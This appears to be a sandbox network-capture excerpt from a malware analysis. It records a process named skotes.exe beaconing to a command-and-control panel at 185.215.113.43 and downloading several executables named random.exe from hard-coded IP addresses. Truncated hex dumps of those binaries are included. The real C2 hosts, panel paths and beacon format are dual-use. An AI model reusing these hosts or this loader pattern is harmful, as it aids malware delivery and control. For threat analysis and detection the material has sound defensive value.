                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      ETag: "673daeda-1de000"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 70 4d 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfpM@M^@WkHOM`OM @.rsrcH@.idata @ +@hicendxx2@qvwfrqsg`M@.taggant0pM"@
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.490433931 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.490443945 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.490457058 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.490467072 CET448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.490478992 CET1236INData Raw: 5a 62 e1 a8 b8 06 b1 1e b8 62 b1 d0 d9 7f 5f 50 b4 1e 1f c3 b7 a9 e1 b2 a8 56 92 f5 4a 1b 81 f7 db b6 cd c6 9f 49 1d 21 b9 c5 9c be 5f 40 b9 60 9c ce f3 e1 48 ca 59 66 dd 84 d1 48 48 46 24 40 a7 42 c1 fc 1b 85 dc 3c 4c 62 4d d6 63 23 06 b9 27 93
                                                                                                                                                                                                                                                                                      Data Ascii: Zbb_PVJI!_@`HYfHHF$@B<LbMc#'%cBtGsg;YvH"&*AQ9jY<j_b6a)_-!y_FA=vfH$ubv#btSBIY P t
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.490489960 CET1236INData Raw: 18 26 69 d8 48 9e 20 d8 a6 42 c1 9b c8 85 ad d4 d7 a3 d8 d7 4b 2a 06 3f 28 1a 01 26 6a 26 01 35 a7 c2 66 1c e0 2a 3f 3f eb 29 f0 d0 5f f6 20 21 07 c2 e1 fc 8a 07 13 b1 a7 b4 f1 8c c1 16 a6 d6 07 23 22 be c5 6a b1 d8 b7 14 31 cb 99 a9 00 c1 7e 13
                                                                                                                                                                                                                                                                                      Data Ascii: &iH BK*?(&j&5f*??)_ !#"j1~8vtjsuf-6QvVMu8"5%1Qfv[<\b*@lQZ`IZ!`KUI(X&!Hv"*a@lZ$
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.490502119 CET1236INData Raw: f7 36 5b c4 4d 03 18 c0 99 21 d1 74 50 74 02 30 c4 ba cd 69 d0 c0 1d f6 41 ea 31 9d 49 fe 03 80 d8 11 f1 c7 90 bb 50 1c 3d f0 b3 f7 9a 7d d4 f6 e4 93 f1 d0 2d e8 15 a1 9b 82 5d df 99 1a f4 b7 e4 a6 69 9b be 42 c9 f9 89 74 c1 a4 82 a9 77 ea 84 39
                                                                                                                                                                                                                                                                                      Data Ascii: 6[M!tPt0iA1IP=}-]iBtw9*y@KPrgh eusK,$,=&+)%#6.r/udW<)6OS$vZZDHI1gXB?LB$4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.490515947 CET1236INData Raw: de 33 4e 3e 68 39 65 b9 ee 62 a2 4d 61 10 00 74 f0 76 e0 28 47 e2 8b 29 c9 b0 a5 d2 30 cb a3 00 d2 da dd d7 9f 08 1c bc a9 ed 39 46 e0 84 99 75 99 bb c4 84 d2 0b 61 08 db 6b 68 32 b4 f4 13 2e fb 2a a0 9d 5e b0 c9 f8 dd 16 0f 84 ff c0 08 b2 ed 96
                                                                                                                                                                                                                                                                                      Data Ascii: 3N>h9ebMatv(G)09Fuakh2.*^s9W9~YphtZnT]05[0*JQ6V4[<b*Z)r=c[O/1w\b%]352!%DgV++'%Z&)+@oidr9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.490531921 CET328INData Raw: 18 94 6d f7 14 7d 58 df f6 97 31 10 64 35 47 3f 87 36 b7 11 82 f5 ea b3 5e e2 1b c6 ad dc aa 1f 90 58 f6 b0 ff ca 5d 99 02 4b 4b b6 0b 0a 4f 3b 3a 34 b2 e9 01 34 10 e2 4b 4a 6b 48 98 aa c1 4d 2c b1 bf ea 29 07 a1 14 1d e2 22 95 e4 97 d4 9c e4 e7
                                                                                                                                                                                                                                                                                      Data Ascii: m}X1d5G?6^X]KKO;:44KJkHM,)"=~<WdEcs#X*B\NQMuNGtrmx&<u 0?.dEJB;oc-}]<lG1`8hEh
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.499594927 CET1236INData Raw: 44 e5 0e d3 b5 ea 42 d8 0e b6 21 b6 78 14 21 57 c0 2e 8c 3e 56 04 ed a5 e0 5f 61 4c 6d de b8 38 34 4a 4b 0f 88 7d 20 01 63 67 3d a0 a2 b2 0e 2f f8 d0 3a a8 2f 2e 1e cd 97 26 92 a1 21 bd 20 ad 60 1f 85 d3 86 43 d8 35 71 3e ab 31 5d 4f be 9d 5e 1f
                                                                                                                                                                                                                                                                                      Data Ascii: DB!x!W.>V_aLm84JK} cg=/:/.&! `C5q>1]O^6"qxlD[)0c9&!ySHWvx.Nrrcr>,?A"}OXye70qL<5LWR{2yHq{h6I*u"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      4192.168.2.650108185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:02.359869003 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:03.007323980 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:02 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      5192.168.2.650109185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:04.621562004 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:05.338134050 CET644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:05 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 31 63 35 0d 0a 20 3c 63 3e 31 30 30 37 36 33 34 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 31 30 30 37 36 33 35 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 37 36 33 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 37 36 33 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: 1c5 <c>1007634001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd97e9c4543b31de15441#1007635001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1007636001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1007637001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1007638001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      6192.168.2.65011031.41.244.11807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:05.347043991 CET54OUTGET /files/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 31.41.244.11
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.049849987 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:05 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Content-Length: 4387328
                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 20 Nov 2024 08:49:01 GMT
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      ETag: "673da27d-42f200"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 e0 c4 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 c5 00 00 04 00 00 c5 b8 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 cc c4 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 cc c4 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL<g(Is2J@C@ _qsX px'@.rsrc p'@.idata q'@ 8q'@rvygeofs@>'@echvckmyB@.taggant0"B@
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.049901962 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.049937010 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.049971104 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.050004959 CET1236INData Raw: aa 34 a7 94 f0 a3 ae 99 85 59 ef 63 c9 48 9c 3b bd 62 9c 60 dd a1 af 16 fa fe 2e 19 61 2b 77 f7 d0 1c 55 10 9f ec 7f f4 8b 60 59 0c c2 34 a1 9d d3 2b be 4c f1 a1 0b 9b 67 40 70 5c 72 40 98 bb fe 3a e7 1f 06 ca bd d5 4e 04 9e 5d 69 a2 fb 05 6d 41
                                                                                                                                                                                                                                                                                      Data Ascii: 4YcH;b`.a+wU`Y4+Lg@p\r@:N]imALn/Q^7zudZw@ 8U1m}<9 \bp4cbbMSmpx'U;'Ix|p0\yo{gBC>{@5q_X
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.050041914 CET1120INData Raw: 4f d2 79 da c8 9e 68 cd c9 39 03 1e a2 c4 26 c6 7d 9a 9c d8 ec 6b 33 57 1e 82 d0 b8 c3 e7 de e5 48 97 c9 2a 5a a2 53 db 55 6f 0f e5 58 97 40 e5 44 0d 1a f0 52 8c b0 f9 3b 2d f9 3d 95 93 29 00 86 56 b2 f6 44 f1 9a c3 57 35 3f fb 74 7f 9a 15 eb 02
                                                                                                                                                                                                                                                                                      Data Ascii: Oyh9&}k3WH*ZSUoX@DR;-=)VDW5?tbuDRJq;\CqzP6vq\iL:>T)6@BN%r50Vqx7|$WFZ]G0I5->UaSgs.Z nZD
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.050077915 CET1236INData Raw: 92 1a 91 23 90 aa 4e 5b f0 55 8c 5f 7c 25 22 49 7d c8 95 da f9 88 2d ef 4c 3a e3 f7 b9 6b 15 89 47 2c 65 8e c2 ab 21 04 eb 20 87 d7 73 25 8c c2 80 9f e1 b3 6b 21 96 a5 a6 22 19 9a 11 cd 1f 60 46 b8 80 97 8d b9 e4 f5 6c 4b c1 d9 37 67 4a f4 0e 5a
                                                                                                                                                                                                                                                                                      Data Ascii: #N[U_|%"I}-L:kG,e! s%k!"`FlK7gJZH'/&Y:=){bg:i Ne#2?eP~##Hj\Pfx G^?N.X)xafz`z[!P}'H.()pR0&u&z.C%
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.050112009 CET224INData Raw: 85 ad b4 b9 2f e1 19 6b 8e ec 21 6b 03 b0 83 f8 90 14 65 59 cd 24 ab 6b a6 d5 ad d6 8a 79 41 3f 9e ce b6 f1 ec 10 99 da d8 b6 e4 de 05 26 4f 61 c5 2c 2b 49 6e e4 d5 1c 49 5d c7 0b 65 06 a0 e2 ce a1 81 5c 2b 41 ac c1 69 26 6c 56 0f 7f 85 2c 0c de
                                                                                                                                                                                                                                                                                      Data Ascii: /k!keY$kyA?&Oa,+InI]e\+Ai&lV,^K$Z&5S$E645$24DRpgZJWg/6Sm(#gxqIN/^@0%Jj5Mh]r$8+ 5Unm
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.050143003 CET1236INData Raw: bf 49 5c e6 cd 62 5b 25 0b ec ee 60 35 aa bb 49 4b 04 56 ce 6d 16 2b dd 78 c0 83 a4 91 35 e7 68 2f e3 c6 14 aa c7 ab 2d a5 e0 ae 4f f6 a2 c0 eb eb 7d 01 db f1 68 84 24 bb ac 6b 5a 77 ec 74 08 85 c5 68 ef 79 33 61 ab a3 d1 e6 b4 6d f7 95 3d 10 94
                                                                                                                                                                                                                                                                                      Data Ascii: I\b[%`5IKVm+x5h/-O}h$kZwthy3am=p$6eiR}l16aS.*8rb]S[`CDD-8EglEsam)T&"-L|_^NKPQlDrfP{-Cqyq0"0nq
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.050179958 CET1236INData Raw: f7 ec c1 ea 0a 66 50 f4 91 d2 1c 56 9f 28 5f 82 5f 0f 68 4c 7a c9 40 1c 3d b4 43 1e cf f6 bf d9 a6 6a 4f ef e5 bf 93 88 4f 7c f0 db ed 59 e9 e1 28 c8 ac 0b 7b cb 6f 0f 85 21 40 e5 68 a4 43 1b 81 d9 f0 c1 6e a5 4c e3 c1 2a 72 e6 a4 cc 4c e9 78 21
                                                                                                                                                                                                                                                                                      Data Ascii: fPV(__hLz@=CjOO|Y({o!@hCnL*rLx!x4@XM$'j#Q%X7H%C`74*_Fx4{.k_]KNMu8j1Q,eN4fg@O7[Gt2M8~G[7J8JDXs?MU],O
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:06.058434010 CET1236INData Raw: 79 59 36 7f b0 5f 57 7b 6f 28 48 e1 b5 c0 48 13 1b 9c aa d5 ed a4 5b 06 c3 eb ee 40 95 cb fc db d9 a8 5a e1 6d 11 10 31 71 9f 82 73 81 2e f2 ac e6 81 70 43 55 8c ed a1 72 9f d7 bc e9 72 5c 13 e8 99 31 e2 eb fb ad a3 cd c4 b8 63 f7 5d ca 11 a1 c7
                                                                                                                                                                                                                                                                                      Data Ascii: yY6_W{o(HH[@Zm1qs.pCUrr\1c]|I5]!fx2_}=zMW^sv&c!m.a({+B?.hX#>6QS6N4~otx}#=?*gW`>{}Y/lj


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      7192.168.2.650112185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:11.689754963 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 37 36 33 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                      Data Ascii: d1=1007634001&unit=246122658369
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:12.398758888 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:12 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      8192.168.2.650113185.215.113.16807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:12.410413027 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.16
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.169949055 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:13 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Content-Length: 1858560
                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 20 Nov 2024 09:41:32 GMT
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      ETag: "673daecc-1c5c00"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e6 72 3b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 ba 00 00 00 00 00 00 00 e0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4a 00 00 04 00 00 88 3a 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 70 05 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 71 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELr;gI@J:@\ppq P^@.rsrc `n@.idata pn@ *p@hcvjgapr0r@xbrvldyiI6@.taggant0I":@
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.169974089 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.169990063 CET448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.170012951 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.170089006 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: !>uO`#/fFO
